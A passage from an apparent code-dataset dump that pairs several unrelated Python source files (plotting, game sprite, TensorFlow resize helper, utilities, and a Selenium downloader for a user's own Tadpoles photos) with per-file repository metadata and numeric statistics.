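        "number_of_expressing_cells": per_cell.shape[0],
        "number_of_reads": per_cell.goi_counts.sum(),
        "abundance_in_expressing_cells": f"{round(per_cell.percent_count_goi.mean(), 2)} +/- {round(per_cell.percent_count_goi.std(), 2)}",
    },
    orient="index",
).T
print(row)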
30.402516
141
0.646463
626
4,834
4.654952
0.161342
0.072066
0.082361
0.047358
0.886754
0.886754
0.87337
0.849348
0.849348
0.849348
0
0.019055
0.22921
4,834
158
142
30.594937
0.763017
0.049441
0
0.770992
0
0.022901
0.233829
0.138767
0
0
0
0
0
1
0
false
0
0.038168
0
0.038168
0.045802
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
41309aa7b95e9754a43f4174cd8bb81a323ae14b
9,102
py
Python
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
1
2019-07-19T20:03:00.000Z
2019-07-19T20:03:00.000Z
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
null
null
null
etreebrowser/graph.py
CameronJRAllan/eTree-Browser
72601450eb8538f79511715c5793a8594bdcfc80
[ "MIT" ]
null
null
null
from PyQt5 import QtWidgets, QtCore from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Cantarell'] import matplotlib.pyplot as plt import matplotlib.patches as mpatch import numpy as np import operator import matplotlib.patheffects as path_effects class CalmaPlot(FigureCanvas): """ This class provides functionality for providing graphical representations of CALMA data. """ def __init__(self, width, height, dpi, hasCalma, parent=None): """ Constructs an instance of the CALMA graphing class. An instance of CalmaPlot inherits FigureClass, a MatPlotLib class for displaying plots in the text of a PyQt5 application. It generates a figure (upon which we may draw), as well as a canvas to place the figure upon. Parameters ---------- weight : int The width of the figure to be created. height : int The height of the figure to be created. dpi : int The dots-per-inch for the figure typically 100. """ # Create Figure instance (which stores our plots) self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue') # Add an initial plot to our figure self.canvasGraph = self.fig.add_subplot(111) # Fetch colour map self.colourMap = self.get_colour_map() # Initialize figure canvas, which initializes an instance of QtWidget FigureCanvas.__init__(self, self.fig) self.setParent(parent) # Store reference to axes self.ax = self.fig.gca() # Hide tick labels to create default style self.ax.set_yticklabels([]) self.ax.set_xticklabels([]) # Add placeholder text if hasCalma: self.placeHolderText = self.fig.text(0.5, 0.65,'Click on a performance track for CALMA data',horizontalalignment='center', verticalalignment='center', fontsize=16) else: self.placeHolderText = self.fig.text(0.5, 0.65,'No CALMA data available for this query',horizontalalignment='center', verticalalignment='center', fontsize=16) # Make background transparent self.fig.patch.set_alpha(1.0) # Resize with window FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) FigureCanvas.updateGeometry(self) self.setMinimumSize(self.size()) def get_segment_colour_map(self, features): """ Generates a colour map for segment features. Parameters ---------- features : float[] Features information. Returns ---------- newColourMap : str[] Colour map for each segment type. """ hashList = {'1' : 'Grey', '2':'Red', '3':'Green', '4':'greenyellow', '5':'Pink', '6':'Orange', '7':'goldenrod', '8':'indianred', '9':'peachpuff', '10':'deepskyblue', '11':'firebrick', '12':'orchid', '13': 'moccasin', '14':'slateblue', '15':'turquoise', '16':'tomato', '17':'darkmagenta', '18':'olivedrab'} return hashList def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs): """ Takes CALMA data for a single track as input, and creates a plot. Parameters ---------- loudnessValues : float[] An array of loudness / amplitude values. features : float[] Features information. duration : float The duration of the track. 
""" # Replace colour map if needed if type == 'segment' : self.colourMap = self.get_segment_colour_map(features) if type == 'key' : self.colourMap = self.get_colour_map() # Hide placeholder text if visible try: self.placeHolderText.remove() text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center', verticalalignment='center', fontsize=16) text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'), path_effects.Normal()]) except (KeyError, ValueError) as v: self.placeHolderText.set_text('') # Perform pre-processing nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration) # Plot waveform self.canvasGraph.axes.cla() self.canvasGraph.plot(xSpaced, nploudnessValues) for index, key in enumerate(features): # Calculate graph positions lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average) # Add annotation to plot self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black', fontsize=7, ha='center', va='center', rotation=270) self.ax.add_artist(rec) # Set axes labels self.ax.set_yticklabels([]) self.ax.set_xlabel("Time (seconds)") # Add colour legend for keys keysAsSet = list(set([x[1] for x in features])) patches = [] for k in keysAsSet: # Plot rectangle for key changes try: fc = self.colourMap[k] except KeyError as keyerr: fc = 'grey' patch = mpatch.Patch(color=fc, label=k) patches.append(patch) self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2) self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95) try: kwargs['release'] except KeyError as v: # Causes crash with multiple plots self.finishDraw() self.fig.patch.set_alpha(1.0) return def calculate_graph_element_position(self, keyInfo, key, index, duration, average): """ Calculates the position of the rectangular patch, relative to the event duration. Parameters ---------- keyInfo : String[] Track meta-data such as label. key : float[] Features information. index : int Index in the keys we are processing. duration : float The duration of the track. average : float Average signal amplitude value of the track. Return ---------- ly : int The y position of the patch. lx : int The x position of the patch. rec : Rectangular A rectangular patch object. """ # Rectangle takes (lowerleftpoint=(X, Y), width, height) xy = (float(key[0]), self.ax.get_ylim()[1]) # If not the latest element in the key-change data if index < len(keyInfo) - 1: # Swap width and height as we are rotating 270 degrees height = keyInfo[index + 1][0] - keyInfo[index][0] else: height = duration - keyInfo[index][0] width = self.ax.get_ylim()[1] angle = 270 # Plot rectangle for key changes try: fc = self.colourMap[key[1]] except KeyError as k: fc = 'grey' rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc) # Calculate label positions rx, ry = rec.get_xy() lx = rx + rec.get_height() / 2.0 ly = average return lx, ly, rec def get_colour_map(self): """ Returns a colour map for key changes to ensure consistent patterns across CALMA plots. 
""" try: return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green', 'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange', 'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff', 'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid', 'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise', 'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab', 'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum', 'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon', 'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'} # If colour not found to match, return grey as a last resort except KeyError as e: print('Unmatched colour: {0}'.format(e)) return 'Grey' def pre_processing(self, loudnessValues, duration): # Clip loudnessValues = loudnessValues[100:-50] nploudnessValues = np.array(loudnessValues) # Frame-rate is the number of values provided, divided by the duration frame_rate = len(nploudnessValues) / duration # Calculate average for placing labels on Y-AXIS average = sum(loudnessValues) / len(loudnessValues) # Generate linear spacing for seconds in X-AXIS xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues)) return nploudnessValues, duration, xSpaced, average def finishDraw(self): self.fig.canvas.draw_idle()
33.340659
128
0.614041
1,082
9,102
5.114603
0.33549
0.013914
0.006505
0.010842
0.117094
0.112035
0.062161
0.028551
0.028551
0
0
0.017057
0.272138
9,102
273
129
33.340659
0.818264
0.285761
0
0.115385
0
0
0.133247
0
0
0
0
0
0
1
0.053846
false
0
0.069231
0
0.176923
0.007692
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4130f4d682db7205fa5d7279b9c35cacaaafe8cb
319
py
Python
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
null
null
null
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
null
null
null
framework/core/error_views.py
ravique/otus-framework
46a519ff4b64c2be7fc23f8f43eefdd3b0c94512
[ "MIT" ]
1
2019-06-28T21:08:55.000Z
2019-06-28T21:08:55.000Z
from framework.core.template_handlers import env, render_template


def not_found_view(request, **kwargs):
    return 'Page not found :('


def forbidden_view(request, **kwargs):
    context = kwargs.get('context')
    template = env.get_template('forbidden.html')
    return render_template(template, context=context)
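The handlers above follow a (request, **kwargs) -> str contract. A tiny hypothetical dispatcher showing how a framework might route an error status to one of them; the handler table and the None request are made up for illustration.

handlers = {404: lambda request, **kw: 'Page not found :('}

def dispatch_error(status, request, **kwargs):
    handler = handlers.get(status, lambda request, **kw: 'Error %d' % status)
    return handler(request, **kwargs)

print(dispatch_error(404, request=None))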
26.583333
65
0.746082
40
319
5.775
0.5
0.121212
0.147186
0
0
0
0
0
0
0
0
0
0.141066
319
11
66
29
0.843066
0
0
0
0
0
0.119122
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
413328f9159158b7e73d6e4e594f24dbc66f5d32
358
py
Python
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
scripts/speed.py
Maxence-Santos/space-invader
4ac359f61ab673c816005d0d85567c3227ec06a1
[ "MIT" ]
null
null
null
import pygame
import os


class Speed:
    def __init__(self, X):
        self.X = X
        self.Y = 700
        self.image = pygame.image.load(os.path.join("img/speed_power_up.png"))
        self.image = pygame.transform.scale(self.image, (55, 55))

    def update_and_draw(self, screen):
        screen.blit(self.image, (self.X, self.Y))
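A hypothetical game-loop snippet showing how the Speed power-up would be used: construct it at an x position and blit it each frame. It assumes pygame is installed and img/speed_power_up.png exists, as the class itself does; the module path in the import is a guess.

import pygame
from speed import Speed  # hypothetical module path for the class above

pygame.init()
screen = pygame.display.set_mode((800, 800))
power_up = Speed(X=400)  # appears at x=400, fixed y=700
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    screen.fill((0, 0, 0))
    power_up.update_and_draw(screen)
    pygame.display.flip()
pygame.quit()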
27.538462
79
0.594972
52
358
3.942308
0.519231
0.17561
0.087805
0
0
0
0
0
0
0
0
0.02682
0.27095
358
13
80
27.538462
0.758621
0
0
0
0
0
0.063401
0.063401
0
0
0
0
0
1
0.2
false
0
0.2
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4133f8869dd2769312a3bb4f13caa9cc3c94d267
821
py
Python
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
36
2019-07-14T16:10:37.000Z
2022-03-29T10:11:03.000Z
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
3
2019-10-09T15:11:13.000Z
2021-07-31T02:17:43.000Z
supermariopy/tfutils/image.py
theRealSuperMario/supermariopy
9fff8275278ff26caff50da86109c25d276bb30b
[ "MIT" ]
14
2019-08-29T14:11:54.000Z
2022-03-06T13:41:56.000Z
import tensorflow as tf


def resize_bilinear(x, shape):
    """
    Raises an error if the tensorflow version is too old, in order to avoid
    buggy resize behavior

    References
    ----------
    [1]: https://github.com/tensorflow/tensorflow/issues/6720
    [2]: https://github.com/tensorflow/tensorflow/issues/33691
    """
    tf_version = tf.__version__
    major_version, minor_version, _ = tf_version.split(".")
    version = int(major_version) * 100 + int(minor_version)
    if version < 114:  # below 1.14
        raise NotImplementedError(
            "Resize bilinear is buggy for tensorflow version below 1.14"
        )
    elif version >= 114 and version < 115:  # 1.14
        return tf.image.resize_bilinear(x, shape, align_corners=True)
    elif version >= 115:
        return tf.image.resize_bilinear(x, shape, align_corners=True)
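The version gate above flattens "major.minor" into major*100 + minor; a quick, dependency-free check of that arithmetic on a few sample version strings:

for tf_version in ["1.13.2", "1.14.0", "1.15.4", "2.8.0"]:
    major, minor = tf_version.split(".")[:2]
    version = int(major) * 100 + int(minor)
    print(tf_version, "->", version, "(>=114:", version >= 114, ")")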
34.208333
76
0.665043
105
821
5.047619
0.466667
0.10566
0.084906
0.113208
0.335849
0.335849
0.184906
0.184906
0.184906
0.184906
0
0.054945
0.224117
821
23
77
35.695652
0.77708
0.270402
0
0.153846
0
0
0.10424
0
0
0
0
0
0
1
0.076923
false
0
0.076923
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41347176b216823b2850da2216f2fdd2a2569240
1,746
py
Python
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
aleph/util.py
mcrouse911/findpeopleviadocument
fecb99a5c167dd281af324f8c862fda70021f081
[ "MIT" ]
null
null
null
# coding: utf-8
import time
import random
import logging

from celery import Task
from banal import ensure_list
from normality import stringify
from pkg_resources import iter_entry_points

log = logging.getLogger(__name__)
EXTENSIONS = {}


def get_extensions(section):
    if section not in EXTENSIONS:
        EXTENSIONS[section] = {}
    if not EXTENSIONS[section]:
        for ep in iter_entry_points(section):
            EXTENSIONS[section][ep.name] = ep.load()
    return list(EXTENSIONS[section].values())


def dict_list(data, *keys):
    """Get an entry as a list from a dict. Provide a fallback key."""
    for key in keys:
        if key in data:
            return ensure_list(data[key])
    return []


def backoff(failures=0):
    failures = min(7, failures)
    sleep = 2 ** (failures + random.random())
    log.debug("Back-off: %.2fs", sleep)
    time.sleep(sleep)


def html_link(text, link):
    text = text or '[untitled]'
    if link is None:
        return "<span class='reference'>%s</span>" % text
    return "<a class='reference' href='%s'>%s</a>" % (link, text)


def anonymize_email(name, email):
    """Generate a simple label with both the name and email of a user."""
    name = stringify(name)
    email = stringify(email)
    if email is None:
        return name
    if '@' in email:
        mailbox, domain = email.rsplit('@', 1)
        if len(mailbox):
            repl = '*' * (len(mailbox) - 1)
            mailbox = mailbox[0] + repl
        email = '%s@%s' % (mailbox, domain)
    if name is None:
        return email
    return '%s <%s>' % (name, email)


class SessionTask(Task):

    def on_failure(self, exc, task_id, args, kwargs, einfo):
        from aleph.core import db
        db.session.remove()
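The backoff() helper sleeps 2 ** (failures + random()) seconds, capping failures at 7. This prints the possible duration range per retry without actually sleeping; plain Python, no dependencies.

for failures in range(10):
    f = min(7, failures)
    low, high = 2 ** f, 2 ** (f + 1)  # random() in [0, 1) spans one doubling
    print("retry %d: %.0f-%.0f s" % (failures, low, high))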
26.059701
73
0.623711
237
1,746
4.523207
0.413502
0.079291
0.033582
0
0
0
0
0
0
0
0
0.006121
0.251432
1,746
66
74
26.454545
0.814078
0.079038
0
0
0
0
0.068879
0.016907
0
0
0
0
0
1
0.122449
false
0
0.163265
0
0.469388
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4134733b100980a0fe17da1135eb9bebe76ac9be
495
py
Python
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
43
2018-05-23T05:45:28.000Z
2021-11-28T08:11:01.000Z
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
null
null
null
psola/utilities/find.py
diguo2046/psola
a45fff605c4ea75145deb4a316924026bf278f85
[ "MIT" ]
15
2018-05-16T04:59:30.000Z
2021-05-16T08:57:37.000Z
#!/usr/bin/env python
"""
psola.utilities.find

Implements a function that sort-of works like MATLAB's find
This is preferable to importing `find' from pylab, IMO

Author: jreinhold
Created on: Aug 18, 2017
"""

import numpy as np


def find(x):
    """
    kind-of mimics the find command in matlab,
    really created to avoid repetition in code

    Args:
        x (numpy mask): condition, e.g., x < 5

    Returns:
        indices where x is true
    """
    return np.squeeze(np.where(x))
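A usage sketch for find(): pass a boolean mask, get back the indices where it holds, squeezed to a 0-d array when only one index matches. The function is restated here so the snippet runs on its own.

import numpy as np

def find(x):
    return np.squeeze(np.where(x))

a = np.array([7, 2, 9, 1, 5])
print(find(a < 5))  # [1 3]
print(find(a > 8))  # 2 (single match is squeezed to a scalar-like index)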
18.333333
59
0.660606
77
495
4.246753
0.766234
0.036697
0
0
0
0
0
0
0
0
0
0.018667
0.242424
495
26
60
19.038462
0.853333
0.757576
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
4136db303bfc69cac0328040053f475ee2387084
20,461
py
Python
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
tadpole-catcher.py
tandalesc/tadpole-catcher
5c5a7fce892aeb6f4c237ff14843fb325032b3bf
[ "BSD-3-Clause" ]
null
null
null
"""This module downloads all photos/videos from tadpole to a local folder.""" import os from os.path import abspath, dirname, join, isfile, isdir import re import sys import json import time import pickle import logging import logging.config from random import randrange from getpass import getpass from configparser import ConfigParser from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains from selenium.common.exceptions import NoSuchElementException import requests class DownloadError(Exception): """An exception indicating some errors during downloading""" pass class Image(object): url_re = re.compile('\\("([^"]+)') url_search = lambda div: Image.url_re.search(div.get_attribute("style")) def __init__(self, div, date=None): self.div = div # Extract URL from div _url = Image.url_search(div).group(1) _url = _url.replace('thumbnail=true', '') _url = _url.replace('&thumbnail=true', '') self.url = 'https://www.tadpoles.com' + _url # Extract id from div # Shorten _id to avoid OS file length limit # TODO more robust id algorithm _id = div.get_attribute('id').split('-')[1] _id = _id[int(len(_id)/2):] self.id = _id # Save date (defaults to None) self.date = date # Get key (for downloading) _, self.key = self.url.split("key=") @property def date_text(self): return "{:02d}".format(self.date if self.date is not None else 1) class Report(object): def __init__(self, div): self.div = div self.display_text = div.get_attribute('outerText') date = int(self.display_text.split('\n')[1].split('/')[1]) self.date_text = "{:02d}".format(date) class Client: """The main client class responsible for downloading pictures/videos""" COOKIE_FILE = "cookies.pkl" ROOT_URL = "http://www.tadpoles.com/parents" HOME_URL = "https://www.tadpoles.com/parents" CONFIG_FILE_NAME = "conf.json" MIN_SLEEP = 1 MAX_SLEEP = 3 MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'] def __init__(self, config, download_reports=True): self.init_logging() self.browser = None self.cookies = None self.req_cookies = None self.__current_month__ = None self.__current_year__ = None self.current_child = None self.download_reports = download_reports self.config = config # e.g. 
{'jan':'01', 'feb':'02', ...} self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS} def config_login_info(self): return self.config['AUTHENTICATION'] def config_requests_info(self): return self.config['DOWNLOADS'] def init_logging(self): """Set up logging configuration""" # Create logging dir directory = dirname('logs/') if not isdir(directory): os.makedirs(directory) logging_config = dict( version=1, formatters={ 'f': { 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'} }, handlers={ 'h': { 'class': 'logging.StreamHandler', 'formatter': 'f', 'level': logging.DEBUG }, 'f': { 'class': 'logging.FileHandler', 'formatter': 'f', 'filename': 'logs/tadpole.log', 'level': logging.INFO} }, root={ 'handlers': ['h', 'f'], 'level': logging.DEBUG, }, ) logging.config.dictConfig(logging_config) self.logger = logging.getLogger('tadpole-catcher') def __enter__(self): self.logger.info("Starting browser") self.browser = webdriver.Chrome() self.browser.implicitly_wait(10) self.logger.info("Got a browser") return self def __exit__(self, *args): self.logger.info("Shutting down browser") self.browser.quit() def sleep(self, minsleep=None, maxsleep=None): """Sleep a random amount of time bound by the min and max value""" _min = minsleep or self.MIN_SLEEP _max = maxsleep or self.MAX_SLEEP duration = randrange(_min * 100, _max * 100) / 100.0 self.logger.info('Sleeping %r', duration) time.sleep(duration) def navigate_url(self, url): """Force the browser to go a url""" self.logger.info("Navigating to %r", url) self.browser.get(url) def load_cookies(self): """Load cookies from a previously saved ones""" self.logger.info("Loading cookies.") with open(self.COOKIE_FILE, "rb") as file: self.cookies = pickle.load(file) def dump_cookies(self): """Save cookies of the existing session to a file""" self.logger.info("Dumping cookies.") self.cookies = self.browser.get_cookies() with open(self.COOKIE_FILE, "wb") as file: pickle.dump(self.browser.get_cookies(), file) def add_cookies_to_browser(self): """Load the saved cookies into the browser""" self.logger.info("Adding the cookies to the browser.") for cookie in self.cookies: if self.browser.current_url.strip('/').endswith(cookie['domain']): self.browser.add_cookie(cookie) def requestify_cookies(self): """Transform the cookies to what the request lib requires.""" self.logger.info("Transforming the cookies for requests lib.") self.req_cookies = {} for s_cookie in self.cookies: self.req_cookies[s_cookie["name"]] = s_cookie["value"] def switch_windows(self): '''Switch to the other window.''' self.logger.info("Switching windows.") all_windows = set(self.browser.window_handles) current_window = set([self.browser.current_window_handle]) other_window = (all_windows - current_window).pop() self.browser.switch_to.window(other_window) def get_current_child(self): return self.get_children_params()[self.current_child_ind] def get_child_name(self): display_name = self.get_current_child()['display_name'] return display_name.split(' ')[0] def get_num_children(self): return len(self.get_children_params()) def get_children_params(self): #tadpoles does not provide the children attribute if there is only one child if 'children' in self.app_params: return self.app_params['children'] else: #if there is only one child, provide default parameters return [{'display_name': 'child'}] def has_next_child(self): return self.current_child_ind+1 < self.get_num_children() # add 1 to current child index, and reset to 0 if too many def 
next_child(self): if self.has_next_child(): self.current_child_ind+=1 else: self.current_child_ind=0 def do_login(self): """Perform login to tadpole (without Google SSO)""" self.logger.info("Navigating to login page.") self.browser.find_element_by_id("login-button").click() self.browser.find_element_by_class_name("tp-block-half").click() self.browser.find_element_by_class_name("other-login-button").click() # Get email, password, and submit elements form = self.browser.find_element_by_class_name("form-horizontal") email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form) pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form) submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form) # Fill out info and submit email = self.config_login_info()['username'] pwd = self.config_login_info()['password'] if email is '' or pwd is '': self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.") email = input("Enter email: ") pwd = input("Enter password: ") email_form.send_keys(email) pwd_form.send_keys(pwd) self.logger.info("Clicking 'submit' button.") submit.click() self.logger.info("Sleeping 2 seconds.") self.sleep(minsleep=2) def iter_monthyear(self): '''Yields pairs of xpaths for each year/month tile on the right hand side of the user's home page. ''' month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]' month_index = 1 while True: month_xpath = month_xpath_tmpl % (month_index, 1) year_xpath = month_xpath_tmpl % (month_index, 2) # Go home if not there already. if self.browser.current_url != self.HOME_URL: self.navigate_url(self.HOME_URL) # Find the next month and year elements. month = self.find_by_xpath(month_xpath, "any more months") year = self.find_by_xpath(year_xpath, "any more years") self.__current_month__ = month self.__current_year__ = year yield month month_index += 1 def iter_urls(self): '''Find all the image urls on the current page. ''' if self.download_reports: # Click the "All" button, so reports are included in our iterator self.sleep(1, 3) # Ensure page is loaded self.logger.info("Clicking 'All' button to load reports") all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline") all_btn.click() # For each month on the dashboard... for month in self.iter_monthyear(): # Navigate to the next month. month.click() self.logger.info("Getting urls for month: %s", month.text) self.sleep(minsleep=5, maxsleep=7) # For each child... for child in range(self.get_num_children()): # Click on child if needed if(self.get_num_children() > 1): self.logger.info("Clicking on %s's page", self.get_child_name()) #0 ->2nd li, 1->3rd li, etc. 
cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2) current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name()) # click events are only activated on mouseover chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click() chain.perform() # Bools to correctly identify reports and images report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText')) image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1)) elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div') # Collect media files until we see a report # Once we see a report, apply that date to all seen media files # Yield processed media files, and then the report # Deal with edge case where no report is found media_buffer = [] for div in elements: if image(div): img = Image(div=div) media_buffer.append(img) elif report(div): _report = Report(div=div) # Apply date to all elements in buffer date_text = _report.date_text for img in media_buffer: img.date = int(date_text) # For each image/video, pop from buffer and yield while len(media_buffer) > 0: yield media_buffer.pop() # Once images are processed, yield report div yield _report # Handle edge case where there are media files but no report while len(media_buffer) > 0: yield media_buffer.pop() # Goto next child, if possible self.next_child() def save_report(self, report): '''Save a report given the appropriate div. ''' # Make file name child_text = self.get_child_name().lower() year_text = self.__current_year__.text month_text = self.month_lookup[self.__current_month__.text] date_text = report.date_text filename_parts = ['download', child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}'] filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html')) # Only download if the file doesn't already exist. if isfile(filename_report): self.logger.info("Already downloaded report: %s", filename_report) return # Make sure the parent dir exists. directory = dirname(filename_report) if not isdir(directory): os.makedirs(directory) self.logger.info("Downloading report: %s", filename_report) div = report.div # Click on div div.click() self.sleep(1, 2) # Wait to load # Extract body body = self.browser.find_element_by_class_name('modal-overflow-wrapper') text = body.get_attribute('innerHTML') # Close pop-up x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button') x.click() # Wait to load self.sleep(1, 2) with open(filename_report, 'w', encoding='UTF-8') as report_file: self.logger.info("Saving: %s", filename_report) report_file.write("<html>") report_file.write(text) report_file.write("</html>") self.logger.info("Finished saving: %s", filename_report) def save_image(self, img): '''Save an image locally using requests. ''' url = img.url date_text = img.date_text _id = img.id key = img.key year_text = self.__current_year__.text month_text = self.month_lookup[self.__current_month__.text] child_text = self.get_child_name().lower() default_download_dir = self.config_requests_info()['default_download_dir'] # Make the local filename. 
filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}'] filename_jpg = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'jpg')) # we might even get a png file even though the mime type is jpeg. filename_png = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'png')) # We don't know if we have a video or image yet so create both name filename_video = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'mp4')) # Only download if the file doesn't already exist. if isfile(filename_jpg): self.logger.info("Already downloaded image: %s", filename_jpg) return if isfile(filename_video): self.logger.info("Already downloaded video: %s", filename_video) return if isfile(filename_png): self.logger.info("Already downloaded png file: %s", filename_png) return self.logger.info("Downloading from: %s", url) # Make sure the parent dir exists. directory = dirname(filename_jpg) if not isdir(directory): os.makedirs(directory) # Sleep to avoid bombarding the server self.sleep(1, 3) # Download it with requests. max_retries = int(self.config_requests_info()['max_retries']) retries = 0 while retries < max_retries: resp = requests.get(url, cookies=self.req_cookies, stream=True) if resp.status_code == 200: file = None try: content_type = resp.headers['content-type'] self.logger.info("Content Type: %s.", content_type) if content_type == 'image/jpeg': filename = filename_jpg elif content_type == 'image/png': filename = filename_png elif content_type == 'video/mp4': filename = filename_video else: self.logger.warning("Unsupported content type: %s", content_type) return for chunk in resp.iter_content(1024): if file is None: self.logger.info("Saving: %s", filename) file = open(filename, 'wb') file.write(chunk) self.logger.info("Finished saving %s", filename) finally: if file is not None: file.close() break else: msg = 'Error downloading %r. Retrying. Response:'+str(resp) retries += 1 self.logger.warning(msg, url) self.sleep(1, 5) def download_images(self): '''Login to tadpoles.com and download all user's images. ''' self.navigate_url(self.ROOT_URL) self.do_login() self.dump_cookies() self.add_cookies_to_browser() self.requestify_cookies() # Get application parameters self.app_params = self.browser.execute_script("return tadpoles.appParams") self.logger.info("Loaded Tadpoles parameters") # start off with child 0 (if more than one exists) self.current_child_ind = 0 for response in self.iter_urls(): try: if isinstance(response, Image): self.save_image(response) elif isinstance(response, Report): self.save_report(response) except DownloadError: self.logger.exception("Error while saving resource") except (KeyboardInterrupt): self.logger.info("Download interrupted by user") def find_by_xpath(self, selector, name='element', form=None): '''Find element by xpath, but catch NoSuchElementException to log which XPath is faulty ''' if form==None: form = self.browser try: el = form.find_element_by_xpath(selector) except NoSuchElementException: self.logger.info("Could not find %s using XPath %s. 
